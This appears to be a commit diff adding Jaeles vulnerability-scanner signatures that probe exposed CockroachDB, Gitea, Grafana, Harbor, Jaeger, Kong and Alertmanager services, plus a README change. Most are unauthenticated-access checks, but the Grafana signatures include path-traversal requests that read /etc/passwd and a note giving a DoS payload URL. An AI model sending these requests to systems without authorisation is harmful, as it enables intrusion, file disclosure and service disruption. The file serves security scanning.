Update new signatures + level to follow Osmedeus Workflow

README.md

@@ -1,9 +1,7 @@
-
 <p align="center">
-  <img alt="Jaeles" src="https://image.flaticon.com/icons/svg/1432/1432425.svg" height="140" />
+  <img alt="OsmedeusEngine" src="https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png" height="200" />
   <p align="center">
-    <a href=""><img alt="Software License" src="https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat-square"></a>
-    <a href="http://github.com/jaeles-project/jaeles"><img alt="Release" src="https://img.shields.io/github/v/release/jaeles-project/jaeles.svg"></a>
+    This project was part of Osmedeus Engine. Check out how it was integrated at <a href="https://docs.osmedeus.org">@OsmedeusEngine</a>
   </p>
 </p>
 

common/cockroach-console-unauth.yaml

@@ -0,0 +1,24 @@
+id: cockroach-console-unauth
+info:
+  name: Cockroach Console Unauth
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/_admin/v1/events?
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Grpc-Timeout: 30000m
+      - Content-Type: application/x-protobuf
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeader", 'application/x-protobuf') && StringSearch("response", 'Descriptor') && StringSearch("response", 'ClusterID')
+
+references:
+  - repo: https://github.com/cockroachdb/cockroach
+  - link: https://www.cockroachlabs.com/docs/stable/admin-ui-access-and-navigate.html

common/gitea-gogs-unauth-access.yaml

@@ -0,0 +1,19 @@
+id: gitea-gogs-unauth-access
+info:
+  name: Gitea and Gogs Unauthenticated Access
+  risk: Medium
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/explore/repos
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", '<title>Explore') && StringSearch("response", 'explore/repos')
+

common/gitea-install-exposure.yaml

@@ -0,0 +1,19 @@
+id: gitea-install-exposure
+info:
+  name: Gitea install exposure
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/install
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", 'Gitea') && StringSearch("response", 'Initial Configuration')
+

common/grafana-dos-probe.yaml

@@ -0,0 +1,36 @@
+id: grafana-ssrf-probing
+info:
+  name: Grafana DoS Probing CVE-2020-13379 (DoS POC)
+  risk: Potential
+
+params:
+  - root: "{{.BaseURL}}"
+
+
+replicate:
+  ports: '3000'
+
+variables:
+  - endpoint: |
+      /
+      /grafana/
+      /debug/grafana/
+      /-/grafana/
+      /gitlab/-/grafana/
+      /-/debug/grafana/
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}{{.endpoint}}avatar/120
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "Content-Type: image/jpeg") && StringSearch("body", "IEND") && StringSearch("body", "PNG")
+
+references:
+  - link: https://grafana.com/blog/2020/06/03/grafana-6.7.4-and-7.0.2-released-with-important-security-fix/
+  - note: |
+      Patched instance will show 404 code. Real DoS POC is http://target.com/avatar/%25anything

common/grafana-unauth-lfi.yaml

@@ -0,0 +1,51 @@
+id: grafana-unauth-lfi
+donce: true
+info:
+  name: Grafana Unauth LFI
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+replicate:
+  ports: '3000'
+
+variables:
+  - endpoint: |
+      /
+      /grafana/
+      /debug/grafana/
+      /-/grafana/
+      /gitlab/-/grafana/
+      /-/debug/grafana/
+  - plugin: |
+      grafana-clock-panel
+    # mysql
+    # graph
+    # influxdb
+    # prometheus
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}{{.endpoint}}public/plugins/grafana-clock-panel/../../../../../../etc/passwd
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Content-Type: application/json
+      - Referer: "{{.BaseURL}}/login"
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", "root:") && StringSearch("body", 'bin/bash')
+
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}{{.endpoint}}public/plugins/{{.plugin}}/../|..%2f../|..%2f../|..%2f../|..%2f../|..%2f../|..%2f/etc/passwd
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Content-Type: application/json
+      - Referer: "{{.BaseURL}}/login"
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", "root:") && StringSearch("body", 'bin/bash')

common/grafana-unauth-panel.yaml

@@ -0,0 +1,25 @@
+id: grafana-unauth-panel
+info:
+  name: Grafana Unauth Panel
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+replicate:
+  ports: '3000'
+  prefixes: 'grafana'
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/api/user
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Content-Type: application/json
+      - Referer: "{{.BaseURL}}/login"
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", "isGrafanaAdmin") && StringSearch("resHeaders", "application/json") && StringSearch("body", 'isExternal":true') && StringSearch("body", '"isDisabled":false')
+

common/grafana-unauth-snapshot-access.yaml

@@ -0,0 +1,36 @@
+id: grafana-unauth-snapshot-access
+info:
+  name: Grafana Unauth Snapshot Access
+  risk: Medium
+
+params:
+  - root: "{{.BaseURL}}"
+
+replicate:
+  ports: '3000'
+
+variables:
+  - endpoint: |
+      /
+      /grafana/
+      /debug/grafana/
+      /-/grafana/
+      /gitlab/-/grafana/
+      /-/debug/grafana/
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}{{.endpoint}}api/snapshots/:key
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Content-Type: application/json
+      - Referer: "{{.BaseURL}}/login"
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", '"isSnapshot":true') && StringSearch("resHeaders", "application/json") && StringSearch("body", 'originalUrl')
+
+references:
+  - author: 'theblackturtle' 
+  - note: 'This is still an 0day'

common/harbor-registry-unauth.yaml

@@ -0,0 +1,28 @@
+id: harbor-registry-unauthentication
+info:
+  name: Harbor Registry Unauthentication
+  risk: Low
+
+params:
+  - root: '{{.BaseURL}}'
+
+requests:
+  - method: GET
+    redirect: true
+    url: >-
+      {{.root}}/api/v2.0/search
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "application/json") && StringSearch("body", "project_id") && StringSearch("body", "artifact_count")
+
+  - method: GET
+    redirect: true
+    url: >-
+      {{.root}}/api/search
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "application/json") && StringSearch("body", "project_id") && StringSearch("body", "artifact_count")

common/jaeger-unauth.yaml

@@ -0,0 +1,22 @@
+id: common-jaeger-misconfig
+info:
+  name: Jaeger UI Misconfig
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+replicate:
+  ports: '8080,16686'
+  prefixes: 'jaeger'
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/api/services
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeader", 'application/json') && StringSearch("response", '{"data":[') && StringSearch("response", '"errors":null}')

common/kong-cve-2020-11710.yaml

@@ -0,0 +1,34 @@
+id: kong-cve-2020-11710
+donce: true
+info:
+  name: Kong Admin API
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+replicate:
+  ports: '8000'
+  prefixes: 'api'
+
+variables:
+  - end: |
+      /
+      /status
+
+requests:
+  - method: GET
+    url: >-
+     {{.root}}{{.end}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "kong_env")
+      - >-
+        StatusCode() == 200 && StringSearch("response", "kong_db_cache_miss")
+
+reference:
+  - links:
+      - https://www.huaweicloud.com/en-us/notice/2018/20200424173014435.html
+      - https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw

common/prometheous-alert-manager-exposed.yaml

@@ -0,0 +1,32 @@
+id: prometheous-alert-manager-exposed
+info:
+  name: Prometheus Alertmanager Exposure
+  risk: Medium
+
+params:
+  - root: '{{.BaseURL}}'
+
+replicate:
+  ports: '9090,8080'
+  prefixes: 'alertmanager'
+
+requests:
+  - method: GET
+    redirect: true
+    url: >-
+      {{.root}}/
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", "<title>Alertmanager</title>") && StringSearch("body", "Elm")
+
+  - method: GET
+    redirect: true
+    url: >-
+      {{.root}}/api/v2/status
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", "cluster") && StringSearch("body", "goVersion") && StringSearch("resHeaders", "application/json")